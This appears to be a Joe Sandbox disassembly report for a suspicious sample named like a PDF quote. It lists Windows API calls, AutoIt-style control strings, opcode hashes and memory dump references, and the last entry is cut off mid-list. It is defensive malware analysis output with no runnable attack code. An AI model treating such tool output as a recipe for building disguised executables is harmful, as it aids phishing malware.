                                                                    • Opcode ID: 611dbdb9168e33187cd8d3776b2ed6fafd02e35d4b00018c5cae58f2da933e0f
                                                                    • Instruction ID: 5442589805f0534aa9012990d4a4909f588fed855fa555f6279682198d6509c9
                                                                    • Opcode Fuzzy Hash: 611dbdb9168e33187cd8d3776b2ed6fafd02e35d4b00018c5cae58f2da933e0f
                                                                    • Instruction Fuzzy Hash: C681B2710042059FDB01DF14C985BEB77D8FF44718F04A469FD89AA0A2DBB0DD45CBA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: 0212e993d69b502dde53390016f388544e43fca3f699b35c5409eb7600195ea4
                                                                    • Instruction ID: 6c224def400d626270035272f751860f59c2f015909f114e151f02765c3eb1f2
                                                                    • Opcode Fuzzy Hash: 0212e993d69b502dde53390016f388544e43fca3f699b35c5409eb7600195ea4
                                                                    • Instruction Fuzzy Hash: 3B31A131A88309AADA20FA60DD53EFF73F49F10B50F201519F499710E1EF91AF449652
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 00EBC2D3
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EBC2E5
                                                                    • SetWindowTextW.USER32(?,?), ref: 00EBC2FC
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00EBC311
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00EBC317
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00EBC327
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00EBC32D
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EBC34E
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EBC368
                                                                    • GetWindowRect.USER32(?,?), ref: 00EBC371
                                                                    • SetWindowTextW.USER32(?,?), ref: 00EBC3DC
                                                                    • GetDesktopWindow.USER32 ref: 00EBC3E2
                                                                    • GetWindowRect.USER32(00000000), ref: 00EBC3E9
                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EBC435
                                                                    • GetClientRect.USER32(?,?), ref: 00EBC442
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EBC467
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EBC492
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: 66f345f1b9957b21b4db4c4cd3cb503dc8df7face885adf732214c73ccea12b5
                                                                    • Instruction ID: cff59e9771686875cd5c6594985922fafcd734bcfb87c9aa8504533f17ac4725
                                                                    • Opcode Fuzzy Hash: 66f345f1b9957b21b4db4c4cd3cb503dc8df7face885adf732214c73ccea12b5
                                                                    • Instruction Fuzzy Hash: CA51593090070AAFDB209FA9DD89BAFBBF5FF04708F104529F686B65A0C774A944CB50
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00ED5129
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00ED5134
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00ED513F
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00ED514A
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00ED5155
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00ED5160
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00ED516B
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00ED5176
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00ED5181
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00ED518C
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00ED5197
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00ED51A2
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00ED51AD
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00ED51B8
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00ED51C3
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00ED51CE
                                                                    • GetCursorInfo.USER32(?), ref: 00ED51DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: 41cf27d6144f47a3aee6e5ea2fca75ff3fcee0794e252e095cab0cff8c436a6a
                                                                    • Instruction ID: bd258bfc6e490fe144798b0c8e6f48736aa0b519a7aeee3da390f88f106c9566
                                                                    • Opcode Fuzzy Hash: 41cf27d6144f47a3aee6e5ea2fca75ff3fcee0794e252e095cab0cff8c436a6a
                                                                    • Instruction Fuzzy Hash: 863134B1D483196ADB109FB68C899AEBEF8FF04750F50452BE50DF7280DA7865058EA1
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EEA28B
                                                                    • DestroyWindow.USER32(?,?), ref: 00EEA305
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EEA37F
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EEA3A1
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EEA3B4
                                                                    • DestroyWindow.USER32(00000000), ref: 00EEA3D6
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E60000,00000000), ref: 00EEA40D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EEA426
                                                                    • GetDesktopWindow.USER32 ref: 00EEA43F
                                                                    • GetWindowRect.USER32(00000000), ref: 00EEA446
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EEA45E
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EEA476
                                                                      • Part of subcall function 00E625DB: GetWindowLongW.USER32(?,000000EB), ref: 00E625EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 1297703922-3619404913
                                                                    • Opcode ID: 950acecb1540eb792365d3ca7ca8f8c54a7adee761e6523dc1a73a03c02eece5
                                                                    • Instruction ID: f2a0e6c21b5079d8e4cefe77e9e1a088986e30df48d981d8184a078bdc9e0b5d
                                                                    • Opcode Fuzzy Hash: 950acecb1540eb792365d3ca7ca8f8c54a7adee761e6523dc1a73a03c02eece5
                                                                    • Instruction Fuzzy Hash: C7719E70150289AFD720DF29DC48FAA77E5FB88704F08452DF995AB2A0D7B0E906DF52
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EEB8E8
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00EE6B43,?), ref: 00EEB944
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EEB97D
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EEB9C0
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EEB9F7
                                                                    • FreeLibrary.KERNEL32(?), ref: 00EEBA03
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EEBA13
                                                                    • DestroyIcon.USER32(?), ref: 00EEBA22
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EEBA3F
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EEBA4B
                                                                      • Part of subcall function 00E8307D: __wcsicmp_l.LIBCMT ref: 00E83106
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl$Ck
                                                                    • API String ID: 1212759294-4079180798
                                                                    • Opcode ID: edbb6a4c87556819d1a158e4c58da34b50171267c6f13cffc0d36f81c3b566f1
                                                                    • Instruction ID: 32269cc0f0ee5b6e91d86c4852c59b226c1c81117ae6f5429a07091ba1f087dd
                                                                    • Opcode Fuzzy Hash: edbb6a4c87556819d1a158e4c58da34b50171267c6f13cffc0d36f81c3b566f1
                                                                    • Instruction Fuzzy Hash: F761DE7190064DBEEF14DF66DC81BBB77ACEB08710F104129F919EA1D1DB75AA84CBA0
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00EEC691
                                                                      • Part of subcall function 00EEAB69: ClientToScreen.USER32(?,?), ref: 00EEAB92
                                                                      • Part of subcall function 00EEAB69: GetWindowRect.USER32(?,?), ref: 00EEAC08
                                                                      • Part of subcall function 00EEAB69: PtInRect.USER32(?,?,00EEC07E), ref: 00EEAC18
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EEC6FA
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EEC705
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EEC728
                                                                    • _wcscat.LIBCMT ref: 00EEC758
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EEC76F
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EEC788
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EEC79F
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EEC7C1
                                                                    • DragFinish.SHELL32(?), ref: 00EEC7C8
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EEC8BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: d6ece76e97f336e4819a971aea04c9e92556a62e7ff1d53d2eb23dd29df66691
                                                                    • Instruction ID: 54cda52f9f4e57ca18cee3c1953f17e9ffc87dd09751faec5d7916fd043282b5
                                                                    • Opcode Fuzzy Hash: d6ece76e97f336e4819a971aea04c9e92556a62e7ff1d53d2eb23dd29df66691
                                                                    • Instruction Fuzzy Hash: C8619B71108345AFC711EF61DC85D9FBBE8FF88750F00092EF695A61A1DB70AA49CB92
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EE448D
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EE44D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: 40390a414b43f71536c69512649bd8851a925aa5973ae9150bd23bae5060b7cb
                                                                    • Instruction ID: af31fc7dd6770fe8afd2a8a9e6ba3a435c993e0819c551e011fdcc46593a0df7
                                                                    • Opcode Fuzzy Hash: 40390a414b43f71536c69512649bd8851a925aa5973ae9150bd23bae5060b7cb
                                                                    • Instruction Fuzzy Hash: 09917C702047459BCB14EF11C491AAAB7E5AF84354F04646CF89A7B7E3CB30ED4ACB81
                                                                    APIs
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00ECA455
                                                                    • GetDriveTypeW.KERNEL32 ref: 00ECA4A2
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ECA4EA
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ECA521
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ECA54F
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 2698844021-4113822522
                                                                    • Opcode ID: 63c3e7c344664394bfc2a649afc96e1083cb5a55f051260a0632290c78498e9e
                                                                    • Instruction ID: 236c2405e6ecc58d8fe99846df4915163931c5de3541f8da174b8fe8f9c238b7
                                                                    • Opcode Fuzzy Hash: 63c3e7c344664394bfc2a649afc96e1083cb5a55f051260a0632290c78498e9e
                                                                    • Instruction Fuzzy Hash: 06515E711443049FC700EF20D99196AB7E8FF88758F04996DF89967261DB31EE0ACB52
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                    • String ID:
                                                                    • API String ID: 884005220-0
                                                                    • Opcode ID: 4a8e75bd795c4337a9f8d0d382009d418d71eb3623bb997590603e1539baf0cc
                                                                    • Instruction ID: 40cbcb8e2b873d36fcd1073e4aee57f0b29e6284acca2955e3891ccff144a820
                                                                    • Opcode Fuzzy Hash: 4a8e75bd795c4337a9f8d0d382009d418d71eb3623bb997590603e1539baf0cc
                                                                    • Instruction Fuzzy Hash: A161E372904215AFDF21AF24DD4176A77E9EF10328F287139E809BB191EB78D941C7D2
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00EEBA8A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00EEBAA1
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00EEBAAC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EEBAB9
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00EEBAC2
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00EEBAD1
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00EEBADA
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EEBAE1
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00EEBAF2
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EF2CAC,?), ref: 00EEBB0B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EEBB1B
                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00EEBB3F
                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00EEBB6A
                                                                    • DeleteObject.GDI32(00000000), ref: 00EEBB92
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EEBBA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: 20da5045010ceb339af54716ff3e1cc6d78f9fb085819a18af66858735e05b2b
                                                                    • Instruction ID: 952ba5f36dcb34aa58e997432e826d9f106e42fb9df869f8ada07a9bf967526b
                                                                    • Opcode Fuzzy Hash: 20da5045010ceb339af54716ff3e1cc6d78f9fb085819a18af66858735e05b2b
                                                                    • Instruction Fuzzy Hash: A9414A7560124DEFDB119FA6DC88EAB7BB8EF89715F108068F909EB260D7309D04DB60
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 00ECDA9C
                                                                    • _wcscat.LIBCMT ref: 00ECDAB4
                                                                    • _wcscat.LIBCMT ref: 00ECDAC6
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ECDADB
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00ECDAEF
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00ECDB07
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00ECDB21
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00ECDB33
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: da5a3f2472118ac19d5f34d1fde5ebc51586e5765011b0a9959f411ac38b460d
                                                                    • Instruction ID: 2e382072880a35e02d08561eaae7290dd3bc3eb870ddee7f6af529f082954f37
                                                                    • Opcode Fuzzy Hash: da5a3f2472118ac19d5f34d1fde5ebc51586e5765011b0a9959f411ac38b460d
                                                                    • Instruction Fuzzy Hash: 8B81927150C2449FCB24EF64CD44EAAB7E8AB88354F18683EF489E7251D732DD46CB52
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EEC266
                                                                    • GetFocus.USER32 ref: 00EEC276
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00EEC281
                                                                    • _memset.LIBCMT ref: 00EEC3AC
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EEC3D7
                                                                    • GetMenuItemCount.USER32(?), ref: 00EEC3F7
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00EEC40A
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EEC43E
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EEC486
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EEC4BE
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EEC4F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: a23d84a931ed67a8faea3c9a5d6f117f413ad4fbae740120370d03e7f3a77d1a
                                                                    • Instruction ID: 890aad045b9696936d93702c1b5e1b0f2a28fb18dcbb7e911d190b4d75ba8f38
                                                                    • Opcode Fuzzy Hash: a23d84a931ed67a8faea3c9a5d6f117f413ad4fbae740120370d03e7f3a77d1a
                                                                    • Instruction Fuzzy Hash: 2C81A0712083899FD710DF16D894A7BBBE4FF88718F20552DF9A9A7291C770D806CB92
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00ED74A4
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00ED74B0
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00ED74BC
                                                                    • SelectObject.GDI32(00000000,?), ref: 00ED74C9
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00ED751D
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00ED7559
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00ED757D
                                                                    • SelectObject.GDI32(00000006,?), ref: 00ED7585
